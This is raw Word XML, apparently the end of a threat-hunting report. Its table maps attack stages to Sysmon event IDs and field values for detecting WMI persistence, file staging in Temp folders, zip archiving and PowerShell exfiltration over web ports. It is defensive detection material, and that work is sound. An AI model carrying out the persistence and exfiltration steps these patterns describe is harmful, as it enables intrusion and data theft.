                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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77D5DF6" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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F8A65E8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>winlog.event_data.Operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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3B745052" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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83A27DC" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WMI Binding — persistence LIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="05F40E6A" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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C950286" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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3B8EB5C8" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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CE09118" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.parent.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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E2B44F2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WmiPrvSE.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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D00E23C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>INVARIANT: WMI execution context</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="735C0691" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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ED99A39" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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CFE72DE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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488999B9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>user.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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1DB1769" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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2D1E02BE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Elevated context xác nhận WMI origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="2F877B98" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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2C74D6D2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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96210BB" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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22892A0" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file.path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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98DE2E9" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>*Temp* OR *Public* OR *ProgramData*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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346D5DD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>File staging location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="42AA53B3" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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B9D36CE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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594C6CB4" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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3F31692" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file.extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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FB5CF6E" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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CE39A7B" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Archive creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="01401624" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="66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B59CCFA" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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F194937" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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81ABE3C" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>destination.port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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500FC48" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>443, 80, 8443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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71DB32FD" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTPS exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="67DFA534" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666"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29E0ADE" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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5413AB6F" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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11A49CED" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>process.name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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7324F8ED" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>powershell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2762" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C6E8B37" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exfil process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B01B4A" w14:paraId="4643C351" w14:textId="77777777" w:rsidTr="00A863A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="666"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09D1AF35" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="685"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4C3B4CA2" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256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19F7CE87" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>file.path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2351"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52BAC531" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>*Temp* OR zip extension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2762" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="622BD2D3" w14:textId="77777777" w:rsidR="00B01B4A" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cleanup artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74D967F2" w14:textId="6883F17D" w:rsidR="00B01B4A" w:rsidRDefault="00B01B4A" w:rsidP="00AE5057">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B01B4A">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440"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8DD00" w14:textId="77777777" w:rsidR="00062C58" w:rsidRDefault="00062C58">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02DFD096" w14:textId="77777777" w:rsidR="00062C58" w:rsidRDefault="00062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E3770" w14:textId="77777777" w:rsidR="00062C58" w:rsidRDefault="00062C58">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="046E50FE" w14:textId="77777777" w:rsidR="00062C58" w:rsidRDefault="00062C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A58DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BDC6FD2"/>
    <w:lvl w:ilvl="0" w:tplc="3A88DAA6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B7D63D40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="256E2F46">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F5BCB580">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7FE87186">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C6426A80">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4E162A40">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="210E611E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2E5850EC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="38AE33D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3252E976"/>
    <w:lvl w:ilvl="0" w:tplc="DCB48AF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A10A8EDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0EDA39DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5892648E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="274AB1EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="804EC022">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4E06B7BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A6E2DD7A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2138BCDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="413608F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6EA1F46"/>
    <w:lvl w:ilvl="0" w:tplc="2528F75C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="303A79EC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E7A64E56">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9BB04424">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="86B8E5FA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6546B8BA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="55400CCE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B37418B2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A4DAED2C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="2130850721">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="775517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4A"/>
    <w:rsid w:val="00003020"/>
    <w:rsid w:val="00062C58"/>
    <w:rsid w:val="00104BF2"/>
    <w:rsid w:val="0013789F"/>
    <w:rsid w:val="00185594"/>
    <w:rsid w:val="001A3B3F"/>
    <w:rsid w:val="001E275F"/>
    <w:rsid w:val="002F741A"/>
    <w:rsid w:val="00332521"/>
    <w:rsid w:val="0033578A"/>
    <w:rsid w:val="00365F0F"/>
    <w:rsid w:val="00433F43"/>
    <w:rsid w:val="00454EEB"/>
    <w:rsid w:val="004B4A29"/>
    <w:rsid w:val="004C1125"/>
    <w:rsid w:val="005239B3"/>
    <w:rsid w:val="0053023A"/>
    <w:rsid w:val="005F45BE"/>
    <w:rsid w:val="00602E07"/>
    <w:rsid w:val="00671801"/>
    <w:rsid w:val="006D2C1A"/>
    <w:rsid w:val="006E354F"/>
    <w:rsid w:val="008E20F7"/>
    <w:rsid w:val="00A863A4"/>
    <w:rsid w:val="00A91F30"/>
    <w:rsid w:val="00AE5057"/>
    <w:rsid w:val="00B01B4A"/>
    <w:rsid w:val="00B54A5A"/>
    <w:rsid w:val="00CA36D2"/>
    <w:rsid w:val="00E14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5E20B"/>
  <w15:docId w15:val="{B4D336E2-5DA6-48CF-A259-ADD44DEAA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2"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1A1A1A"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="180" w:after="8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A91F30"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A91F30"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A91F30"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A91F30"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00A91F30"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A91F30"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0E2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E275F"/>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E275F"/>
    <w:rPr>
